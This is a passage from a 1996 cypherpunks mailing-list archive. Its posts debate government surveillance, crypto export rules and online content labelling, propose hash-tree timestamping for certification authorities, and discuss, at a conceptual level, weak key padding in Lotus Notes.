sacrifice of vast amounts of our wealth. There are a a bunch of people
that walk around in these temples, whom one might characterize as the
priests of this cult, and they are supposedly imbued with astonishing
extraordinary powers by virtue of association with this Divine Entity,
but when I glance at them I usually see only ordinary humans, with no
visible stigmata of their association with this extracorporeal Holy
Being worshiped by the body of the people.

In any case, we are here expected to believe that it is okay if the
Secular God of our land mass, our Government, spies on the Secular
Gods of other land masses. However, viewed from my perspective, when
"the Government" of our land listens in on "another Government's"
communications, from what I can tell what is happening is that
individual humans in the guise of High Priests converge at their
temple in Fort Meade for the purpose of listening in on conversations
between individuals humans elsewhere who are associated with other
Government cults in some sort of ordained capacity. One might argue
that this discourtesy between the followers of rival cults is not
something for we, the arch-atheists, to care about, but I must note
that in principle what is going on is the same -- people are listening
in on other people's communications -- not the Divine Governmental
Being itself listening in on the communications of other Divine
Governmental Beings. These Divine Governmental Beings don't
exist. Only the humans claiming the authority of the Divine
Governmental Beings exist.

So, in summary, if we believe that it is wrong for our fellow humans
to tap phones and listen in on the communications of other humans, I
see no reason to believe in an exception granted to some humans
associated with the Government Cult of our land mass to listen in on
humans associated with the Government Cult of another land mass.

> It is the ethical duty of a responsible government to read other 
> government's mail, absent any treaties or gentlemen's agreements to the 
> contrary.

This might be fine were there such a creature as a Holy Governmental
Being that wished to listen in on other Holy Governmental Beings, but
just as one never actually could prove the existance of the Capitoline
Jove in spite of the great temple that the Romans built to Him, so too
I find no evidence for the existance of the Holy Governmental Being in
spite of the fervor of the followers who have built the great marble
temples in the manner of the Romans all over Washington and other
provincial capitals throughout the Empire, pardon, the land mass we
call the United States.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jdoe-0007@alpha.c2.org
Date: Fri, 26 Jan 1996 15:47:36 +0800
To: cypherpunks@toad.com
Subject: John Doe
Message-ID: <199601260458.UAA04121@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


The John Doe NYM/Remailer interface for Windows is a most excellent
program that will allow even the most cypher-illiterate to make use of
the technology that has been the exclusive domain of those in the
"techno-know".  It was a piece of cake to set up, obtain a NYM and select
inbound and outbound remailers with options to chain as many as your
paranoia deemed appropriate.

$25.00 seemed a little steep but they will get my $$$.  Nice Job.

John Doe 0007




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Fri, 26 Jan 1996 15:45:22 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Elitism
Message-ID: <2.2.32.19960126050633.006b0fc4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:15 PM 1/25/96 EDT, "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> wrote:

>       You might also find Robert Reich's _The Work of Nations_
>interesting.

As a short, elegant, powerful argument against statist thinking, I recommend
most highly Kenichi Ohmae's THE END OF THE NATION STATE: THE RISE OF
REGIONAL ECONOMIES. Mr Ohmae focuses on areas that have geographical and
social meaningfulness, on the scale of Hong Kong/Canton, Catalonia, the
Pacific Northwest, and so forth. He quickly makes hash of the idea that the
nation-state is a meaningful unit for modern economic analysis.

ObCrypto: He looks for region-state governments that, among other things,
respect citizens' privacy.

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bea@algonet.se (Bjorn E. Andersson)
Date: Fri, 26 Jan 1996 06:39:49 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: PGP in Eudora and other mail programs
Message-ID: <v02130506ad2d90c28cf3@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 11.54 96-01-25, Timothy C. May wrote:

>At 2:13 PM 1/25/96, Clay Olbon II wrote:
>
>>Seriously, this just illustrates the idiocy of banning "hooks" in software.
>>How does...
[snip]

>
>And yet how many of these programs actually can transparently
>(automatically, push-button, etc.) support PGP? I've been a user of Eudora
>for several years, and have pressed for PGP hooks. The company, Qualcomm,
>once told me it was on their list of things to do, but....
>
>A few years later, still no PGP-in-Eudora. One would think that this would
>be a powerful way of distinguishing their product from other mail packages.
>
>(I understand from this list that Eudora for Windows is now doing this much
>more automatically, that someone has a PGP-in-Eudora package. I don't think
>it was from Qualcomm, but I could be wrong. As a Macintosh version user,
>I'm hoping this comes to the Mac version as well.)
>
>Food for thought.
>
>--Tim May

Why don't try Raif Naffah's MacPGP Control, now in version 1.0b2, version
1.0b3 soon to be released.

It covers whatever the Windoze interfaces does and actually they don't even
play in the same league.

Bjorn A.

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Bjorn E. Andersson <bea@algonet.se> or <bjorn_andersson@macexchange.se>
               PGP key available at Public Key-servers
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Fri, 26 Jan 1996 15:32:30 +0800
To: "cypherpunks@toad.com>
Subject: RE: RANT: cypherpunks do NSA's job for them!!
Message-ID: <01BAEB69.A2BB7E80@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Vladimir Z. Nuri


your friends, family, associates, etc. constantly
*reminding* you of that law is the major, critical, unseen mechanism
in propagation of laws.
............................................................................

Actually, Vlad is has a remote point.  

When signs on the road advise everyone to buckle up - because "it's the law", it has the intent of providing the be-all and end-all reason for why we should do the things we do.  

When certain activities are described as being "illegal" it lends to the laws surrounding them an air of legitimacy, even though most anyone on this list who refers to them in that way understands that they are phrasing their words in terms of how these actions are perceived/categorized by the lawmakers, not by the cpunks.

Yet you must understand, Vlad:  you aren't going to figure out how to deal with a looming threat like ITAR simply by being nonchalant & devil-may-care.   The fact that some people (lawyers) know what corporations & individuals are facing if they try to import or export "illegal" substances like abstract code, and the fact that some people (programmers) discuss the issues openly, does not mean that they are headed in the direction of submission to the given obstacles.   

It just means that they're thinking through the problem, to clarify just what the situation is, to give conscious consideration to what anyone might have to deal with as a consequence of their decisions (to do what they will regardless of the NSA's perceptions).

I think this is a valuable & legitimate pass-time.

   ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jdoe-agamemnon@alpha.c2.org
Date: Fri, 26 Jan 1996 16:14:59 +0800
To: cypherpunks@toad.com
Subject: NOISE  Test Ignore
Message-ID: <199601260522.VAA07510@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Test  Test  Test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 26 Jan 1996 15:56:56 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
Message-ID: <v02120d0ead2e13955502@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:11 1/25/96, Timothy C. May wrote:

>Suppose "alt.fan.barney" is rated G, by "someone." Since I can post stuff
>with strong language, and worse, to alt.fan.barney, is it still rated G, or
>was my stuff blocked?

What you will see is something like this: all lists/newsgroups will have to
be moderated with the name of the moderator clearly stated just as it is in
print magazines today. If something that is potentially dangerous to
children, that is any information that might encourage anyone to think for
themselves, gets posted, the moderator will be held liable. Since that will
lead to the moderator erring on the side of caution, discussions on USENET/
mailing lists will become next to useless and therefor die out for anything
non-technical (no, that won't include cryptography) or politically
incorrect.

Any ISPs carrying non-moderated groups or mailing lists is subject to the
often mentioned mandatory long years in prison under the Child Protection
Act of 1998.

It is all rather simple. And the public will thank the kind and caring
legislators that show such deep concerns for their children.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Fri, 26 Jan 1996 14:17:09 +0800
To: cypherpunks@toad.com
Subject: CAs and Digital Timestamping
Message-ID: <01I0FXIXB84Y9DCXJ9@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: sci.crypt, sci.crypt.research, cypherpunks ##
  Date: 01/25/96 10:08 am ##
  Subject: CAs and Digital Timestamping ]

At the RSA conference last week, it occurred to me that there's a
really neat application for digital timestamps (as done by Surety).
Whenever a CA (Certification Authority) issues a public key
certificate, it should also digitally timestamp it.  This provides a
relatively clean way to recover from top-level CA key compromises.

First of all, let's talk about hash trees.  A hash tree (I think the
idea was originated by Merkle, but I could be wrong) is a binary
tree.  Each node in the tree eventually winds up with a hash value
associated with it.  The bottom nodes on the tree are hashes of
individual messages.  The other nodes are made up of the hash of all
their children.  This looks like this:  (pardon the ASCII art)

:                               H_0 = hash(H_1,H_2)
:                          /                    \
:              H_1 = hash(H_3, H_4)        H_2 = hash(H_5,0)
:             /         \                     /         \
:    H_3 = hash(M_0)  H_4 = hash(M_1)  H_5= hash(M_2)     0
:
:

The neat thing about this is that, if I know H_0, then when someone
wants to verify that M_0 appears in the hash, they only have to tell
me H_4 and H_2, and the position of M_0 in the tree.  I can then
find H_3 = hash(M_0), H_1 = hash(H_3,H_4), and verify that the final
H_0 = hash(H_1, H_2) gives the right output value.  (Compare this
with a hashing chain, and you can see that, for large trees, there's
a big advantage here.  The number of values needed to authenticate a
given message in this tree is log_2(number of messages in the tree),
while the number of values to verify a chain is is the whole number
of messages in the chain.

In the digital timestamping service offered by Surety, they use hash
trees of this kind, because this allows efficient verification of a
digital timestamp.  The idea behind this is that a message is hashed
into the hash tree, and that the final value of the hash tree each
day or week is widely published, including in the New York Times. So
long as it's not feasible to go back and change that value, and it's
not possible to find collisions for the hash function, any hash
value that appears in that tree must have been presented to the
timestamping people at some point before that tree's final hash was
calculated.

Here's how we use this in having a CA sign certificates.

CA Signs a Key:

1.   At the beginning of the day, the CA generates a random value,
R_0, and has it digitally timestamped.  The resulting timestamp is
used as one of the entries in today's hash tree.  (If the CA is
their own digital timestamp service, then they'll have to use the
previous day's ending value, which is reasonable enough.  They'll
also have to work a lot harder to publish this value each day or
week.)

2.   For each certificate to be generated:

     a.   The CA verifies the information in Certificate_u, then
          signs it with SK_{CA}.  Certificate_u contains some
          indication of the time and date.

     b.   The CA hashes Certificate_u into its daily hash tree.

     c.   The CA sends Certificate_u to user u.

3.   At the end of the day, the CA publishes its own final hash tree
value, and gets this value digitally timestamped.  (This amounts to
having the CA act as its own "node." for the timestamping service.)

Now, imagine that the CA's key has been compromised.  (We have to
assume that the CA's daily operations were OK--if not, there doesn't
seem to be a clean way to recover cleanly.)  The person who has the
CA's key can issue false certificates.  After a while, one of these
false certificates are noticed.  How do we recover?

We use the hash trees and the digital timestamps which we've made in
the past to verify each certificate presented for recertification.
The digital timestamps allow us to immediately verify that this
certificate was issued by this CA at this time.  And we can be
certain that this hash tree is correct because it's been digitally
timestamped.

What this does, essentially, is to allow us to quickly recover from
key compromises.  We still have problems if someone can take over
the operations of our CA for a few days or weeks, though in that
case, we probably know the likely dates.  No compromise at the CA
can put a different date's timestamp on a certificate.

Now, I should note that I think Merkle talks about using hash trees
to do public key certificates, in his thesis, and the idea may be
patented.  (It's been a couple of years since I looked at his
thesis, so this is a little hazy.)  However, we're not using them
here to provide certificates--we're using them to authenticate the
certificates in the event of a catastrophic key compromise.  I don't
think Merkle talked about this, but I could be mistaken.  (At any
rate, I've never seen any mention of it since then, though it's an
obviously useful idea.)  If the tree structure is patented, then we
could still do this by using chains or some other structure.  Does
anyone know if this basic idea has been proposed before?  I am
pretty sure I haven't seen it, but it seems pretty obvious now that
I think about it.  We could even recover using this method from a
break of the hash function supported (so long as the timestamps are
done with multiple hash functions, and at least one isn't broken),
or the public key algorithm used.

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQfn70Hx57Ag8goBAQETUQQA3S7k8rrYDud5N3uVdUqSVHC3VH+Tpmuu
wcRisf8PrYX/I9Q4vBTN7SS0H30Xl1bRTQyS1mQP+CuyBlESi1qn0OMKbgAYPndd
1qYOvrX/29fMbhrO7VQjAcSAHpCZOvoVfsq0fWwv4zzUIhJBZNFnMxdSm4eNrmEv
U3/oo5CiM2o=
=7TIl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Fri, 26 Jan 1996 14:13:11 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus Notes
Message-ID: <01I0FXJK293C9DCXJ9@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: Cypherpunks, Lucky Green ## Date: 01/24/96 12:33 pm ##
 Subject: Re: Lotus Notes]

>Date: Tue, 23 Jan 1996 23:24:39 -0800
>From: shamrock@netcom.com (Lucky Green)
>Subject: Re: Lotus Notes

>You are assuming that they *want* the hole to be unpatchable. I see
>no reason why they should. "We tried out best, but these darn
>hackers found a way to enable full 64 bits. Sorry, but we tried."
>Perhaps the most intelligent thing to do was to keep the GAK subject
>to a simple patch.

I'm sorry, I don't think I was very clear in this post.  I wasn't
concerned with whether Lotus left the escrow feature easy to
disable, I wanted to know whether they'd intelligently padded their
RSA-encrypted 24-bit key leak.  If they thought this through, they
did, but if not, then they have essentially left their exportable
security level at 40 bits, because of the dictionary attack David
and some other people pointed out.  This ought to be relatively easy
to check from disassembled code, but it can also be checked by
simply generating a few thousand messages (maybe six or seven
thousand, to be safe), and seeing whether or not we ever get a
duplicate LEAF. We expect to, after about 2^12 encryptions, if
they're using fixed padding.  Of course, RSA key exchange blobs for
short keys must always be padded out like this, or be vulnerable to
dictionary attacks.

P.S. Does anyone know whether or not the RSA key used to partially
escrow the session key is a reasonable length (i.e., 1024 bits)?  If
it's another 512-bit RSA key, then it was born with a bullseye on
its chest.

>-- Lucky Green <mailto:shamrock@netcom.com>
>   PGP encrypted mail preferred.

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQfoEEHx57Ag8goBAQH7mQQAwHZ5ZH++AbVGER88rtRbgiu+syYNI9AI
bwgeUT3gYpf1kqRksg5dLluAabEo+OSorzb5x/WrF1bemkqr3Y+GtEhh8HfSGaZG
pmAe1hwSyGLQImqonZ/MxYz17eOK2Win9VBt1o+0jQCceUN8pc/QXRZvEAzjdkS4
lKijlYa/XYE=
=Ii7i
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 26 Jan 1996 09:31:23 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: [NOISE] are you a liberal? <g> Re: SS Obergruppenfuhrer Zimmermann (NOT!)
In-Reply-To: <Pine.SV4.3.91.960123165951.9174A-100000@larry.infi.net>
Message-ID: <Pine.BSD.3.91.960125205957.1963E-100000@usr6.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



	gee, Alan, maybe I was a bit hasty calling you a liberal!  but at
    least your friends got a laugh out of it. they say as you get older,
    you are supposed to mellow...  Tim --any comment, are you more or less
    irrascable? I know my answer!

	looks like the Telegraph is retracting the stories in a big
    way, including the possibility PRZ may be a hero for freedom!

	This is a contest:

1.	    "The Constitution is not a law, but it empowers the people
	to make laws....  The Constitution tells us what shall not be a 
	lawful tender.... The legislature has ceded up to us the 
	privilege of enacting laws as are not in consistent with the 
	Constitution of the United States.... The different states, and 
	even Congress itself, have passed many laws diametrically 
	contrary to the Constitution of the United States.
	    "...Shall we be such fools as to be governed by its laws, 
	which are unconstitutional?  No!  ...The Constitution 
	acknowledges that the people have all the power not reserved to 
	itself. I am a lawyer, a big lawyer and comprehend heaven, earth, 
	and hell, to bring forth knowledge that shall cover up all 
	lawyers, doctors and other big bodies. This is the doctrine of 
	the Constitution, so help me God. The Constitution is not law to 
	us, but it makes provisions for us whereby we can make laws. Where
	it  provides that no one shall be hindered from worshipping God 
	according to his own conscience, is a law. No legislature can 
	enact a law to prohibit it. The Constitution provides to regulate
	bodies of men and not individuals."

2.	    "If we have to give up our chartered rights, privileges, and 
	freedom, which our fathers fought, bled, and died for, and which
	the constittion of the United States and of this state guarantee
	unto us, we will do so only at the point of the sword and the
	bayonet."
	
 !!!    the test: who said this, and when, and where is it referenced?

        I haven't figured out a prize, but maybe a character mode face
    --how about Bubba?  or even better yet, King Hillary, standing up to
    give the oath before Congress tomorrow --do you think she will finish
    the oath as written: "So help me God"  -?  

	too bad I do not even own a television (snake oil makes me break
    out in hives); Hillary should be great as my money says she will still
    lie --until she learns that the only way of not trapping yourself 
    in contradictions eventually means your tell the truth
	
On Tue, 23 Jan 1996, Alan Horowitz wrote:

> The reporter's slander against Zimmerman was not accidental, or the 
> result of ignorance.  Calling someone a Naxi sympathizer is not something 
> that one should do without a smoking gun.
> 
	I agree, except the press forgets rights in favour of scandal 
    which means money, and money begets money (advertisers).

> This act of aggression against cypherpunks, attempts to box us into a 
> corner. Our enemies want to keep us on the defensive.  In that context, 
> any and all energy we spend on "educating" and "correcting" is 
> self-defeating. The hoplophobe lobby has shown, that enemies of freedom 
> will not permit themselves to be "corrected". They will merely escalate 
> the rate and size of their lies. Before slanders about "cop-killer 
> bullets" could be corrected, they had moved onto "assault weapons".
>
> We need to find a way to take back the initiative. We need to find a way 
> to put the fear of God into liers. Violence won't work, since they are 
> capable of human-wave attacks. 
> 
> I honestly don't know what reporters and editors fear the most. But, even a 
> snake can be trained, if you can pinpoint the proper negative feedback.
>
	advertising dollars going down the drain. litigation, even if 
    frivolous against corporate advertisers for supporting falsehoods
    and innuendos which will destroy the american way of life. Stockholder
    lawsuits are often the most effective.  I do not like the "means" of
    U.S. Courts, but they are always using the courts against us, so 
    turnabout is fair play.
	
		attila
 
> Alan Horowitz
> alanh@norfolk.infi.net
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Fri, 26 Jan 1996 08:23:47 +0800
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601251947.OAA16586@jekyll.piermont.com>
Message-ID: <Pine.3.89.9601252203.A16004-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Perry E. Metzger wrote:

> 
> Phill refers to the man who said "Gentlemen do not read each other's
> mail", (Henry L. Stimson) as a twit.
> 
> I highly disagree. In some ways I regard him as our patron saint
> (although the man was actually far from saintly and later as a member
> of the Roosevelt cabinet adopted an opposite policy of aggressive
> signals intelligence.)
> 
> Why is he our patron saint? He was a government official coming out
> against invasion of privacy. Isn't that what we are all after, in the
> end? The reason we deploy cryptography is to assure privacy for
> all. We often refer to those who listen in on conversations
> (regardless of who they are) as, in some sense, our
> opposition. Therefore, is not Stimson's remark in closing down
> Yardley's "Black Chamber" to be praised rather than attacked?

The crypto relevance of this post is tenuous at best :-).  Please keep 
your comments to relevant code or technical discussions of crypto.  This 
is *not* patronSaintPunks!  Come on!

For the humor impaired *this is a joke*.  Not flame bait.  Just trying to 
get Perry to lighten up a bit.


> 
> Perry
> 

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Fri, 26 Jan 1996 02:39:55 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <199601251654.KAA14124@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>
>Item (1) allows people to travel abroad if they know crypto.  It's unclear
>that it allows them to emigrate or return to their country of origin.
>Items (3),(4),(5) seem to prevent such a person from using, or even mentioning,
>crypto to or "on behalf of" a foreign person.
>
Okay, question..  Is "crypto" and "defense" the same thing?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Domeika <Max_Domeika@ccm.jf.intel.com>
Date: Fri, 26 Jan 1996 17:26:43 +0800
To: cypherpunks@toad.com
Subject: Problem building PGP on NT
Message-ID: <Thu, 25 Jan 96 23:56:01 PST_1@ccm.jf.intel.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

  First question:  Is this the appropriate place to go with this kind of 
question.  If not, I apologize.  Anyways here goes:  
 
  I'm trying to build PGP, the MIT version under windows NT using 
Microsoft C++ version 4.0.  The program builds after a few modifications 
to the makefile but cannot generate a RSA key.  Everytime, I type pgp 
-kg and answer the required questions, pgp attempts to generate some 
primes and apparently fails.  Anyone have a clue as to what the problem 
may be???

  I know there is an executable of PGP for NT already made, I've used 
it.  So I at least know it's possible to build on NT.  Anyone else 
attempt a port to NT???

Thanks ahead of time,

Max




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Fri, 26 Jan 1996 17:15:02 +0800
To: williams@va.arca.com
Subject: Re: "This post is G-Rated"
Message-ID: <199601260719.XAA00770@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 02:06 AM 1/26/96 GMT, Jeff Williams wrote:

>Maybe nobody would use the flag, but I don't see how it could hurt. If I had
>kids, I would appreciate having the option of sorting out all the stuff that
>is "NIFK" by the author.

My concern about such a flag is that if it was implemented widely, it would
be a small step from being optional to being mandatory. As things stand,
were some legislature to adopt a "mandatory labelling" statute tomorrow,
we'd end up with a complex and pointless mess of conflicting and
incompatible attempts at compliance, rendering the labelling scheme
effectively useless; and, likely, "industry" (e.g., the big service
providers + AT&T & MCI & Sprint etc) would oppose the legislation on the
grounds that compliance would take several years and complex design to bring
about. So we'd get some sort of grace period to argue against it, prepare
good test case(s), establish offshore mailing lists/servers, and so forth. 

But if we let the market do an efficient job of developing and deploying a
labelling standard, over the course of the next few years, we're an
afternoon's sorry debate and a few bought-and-paid-for committee meetings
away from a market standard turning into a statutory duty. 

This makes me think that if development of a labelling standard is imminent,
it's time to find ways to subvert it, misuse it, avoid it, and otherwise
treat it like an enemy. It's not necessarily an enemy until it's coopted
into service by a coercive force (be it big brother^h^h^h^h^h^h^hgovernment or 
big brother^h^h^h^h^h^h^hcorporation) but it's a potential threat. 

Are you sure that your relatively moderate "less NIFK material is a good
thing" stance is a good reflection of others' positions? My impression is
that many people are dissatisfied with anything less than a "zero tolerance"
position re kids & porn or kids & drugs or kids & sexual choice or whatever. 
Your view of a partial-cooperation world isn't especially draconian, but do
you really think that others will be as tolerant of other positions re
labelling? 
--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 26 Jan 1996 17:10:01 +0800
To: JMKELSEY@delphi.com
Subject: Re: Lotus Notes
In-Reply-To: <01I0FXJK293C9DCXJ9@delphi.com>
Message-ID: <Pine.SOL.3.91.960125230335.2084A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


[Birthday paradoxing to get test for non-random padding]

> simply generating a few thousand messages (maybe six or seven
> thousand, to be safe), and seeing whether or not we ever get a
> duplicate LEAF. We expect to, after about 2^12 encryptions, if

If you were to try this, you'ld probably want to try around 12,000 to 
reach the 95% confidence interval. However, I seriously doubt that this 
is going to be the case; they're using BSAFE, which does random padding 
to PCKS1 in just about all it's RSA modes.  The only people Lotus could 
hire to get it that wrong probably have too much tied up in options to be 
easily head-hunted.

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jan 1996 16:15:03 +0800
To: cypherpunks@toad.com
Subject: This is not "DivineBeingPunks"
Message-ID: <ad2dae4f12021004983e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:52 AM 1/26/96, Perry E. Metzger wrote:

>I'm sure that most people seem to believe in this quasi-Divine Being,
>of course. A lot of people seem to have constructed temples to some
>Holy Being that they refer to as "The Government", made of marble and
>steel and glass (often in the manner of temples constructed in ancient
>times to Jove or Apollo). There are strange rites associated with the
>worship and sustenance of this Divine Entity, such as the ritual
....etc. etc. etc.

Since Perry has on several occasions said he does not want to hear about
politics and other "off-topic" posts, and since he has written at least
five of these posts just today (the "Gentleman do not" thread), I suggest
he heed his own advice.

I was skipping most of these posts that Perry, Rich Graves, and others are
writing, but the hypocrisy of calling for others to not engage in
"off-topic" posts while writing five of them himself...well, it speaks for
itself.

Debating basic libertarian theory, including the rights of Divine Beings,
quasi-Divine Beings, Secular Beings, etc., is best done on another list, or
in private e-mail.

What's sauce for the goose is sauce for the gander.

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Fri, 26 Jan 1996 17:38:21 +0800
To: cypherpunks@toad.com
Subject: 9th Circuit addresses vicarious liability
Message-ID: <199601260755.XAA05833@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain



The 9th Circuit issued a ruling today in _Fonovisa v. Cherry Auction_
overturning an ED CA district court's ruling re vicarious liability for
copyright and trademark infringement. If I remember correctly, the lower
court's ruling was one of those relied upon by Judge Whyte in his recent
_Netcom_ ruling. In any event, it looks like it's an important development
in vicarious liability and thus liability for ISP's and remailers and other
providers of electronic "space" or conduit.

http://www.callaw.com/9415715.html

--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jan 1996 16:52:52 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
Message-ID: <ad2dbabd1402100483b4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I typically enjoy Lucky's jaundiced analyses, but I think he is overly
paranoid in this one:

At 5:28 AM 1/26/96, Lucky Green wrote:

>What you will see is something like this: all lists/newsgroups will have to
>be moderated with the name of the moderator clearly stated just as it is in
>print magazines today. If something that is potentially dangerous to

First, printed material does *not* have to have an author or publisher
specified. The usual case cited is the Supreme Court decision on "anonymous
handbills." I know of some zines that have no identifiable origin point.
And anonymous pieces are published (even where the publisher/editor does
not know the true author.)

Second, Usenet is a global thing. Which national laws will apply? If the
U.S. somehow is dumb enough to demand that each of the 12,000+ current
Usenet groups have a moderator in a U.S. jurisdiction....well, there are
too many issues here to properly deal with in a short note.

Third, if the moderator is liable for "allowing" inappropriate material to
get through, I predict a rather severe shortage of moderators. It's already
a thankless job, so why any sane person take on the liability of doing it?

Fourth, the Soviets couldn't control the underground "samizdat" press, and
this was when the sanctions were stronger and the channels of communicaton
more available. Today, in the West, there are at least two orders of
magnitude more channels, and several orders of magnitude more sites,
bandwidth, etc.

Fifth, major constitutional challenges would be mounted. The First
Amendment says that a posting to a public discussion does not first have to
be cleared by a censor/moderator! (I'm not saying a group cannot be
moderated, I'm saying that making it a crime to have an unmoderated,
uncensored group will not pass constitutional muster.)


--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 26 Jan 1996 17:53:09 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft's CryptoAPI - thoughts?
Message-ID: <2.2.32.19960126083734.008e0b90@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:02 AM 1/26/96 -0500, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>rickt@psa.pencom.com writes:
>> [Info can be found at: http://www.microsoft.com/intdev/inttech/cryptapi.htm]
>
>Has someone here managed to extract PostScript hardcopy of the CAPI from this
>Web page? I tried earlier this evening and wound up with a miniature 
>ecological disaster on my hands. The page says:
>
>"For ease of online reading and printing, we've provided copies of this
>lengthy document in Microsoft Word and Postscript formats."

{Disaster story deleted]

Ghostview seems to read it OK.  I have not printed it yet.  (I will do that
tommorow.)  It does seem to be missing any sort of Indexing information,
which is not helpful...  You may be able to use ghostscript to convert it to
eps or something else useful to your printer.

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
               National Security uber alles!





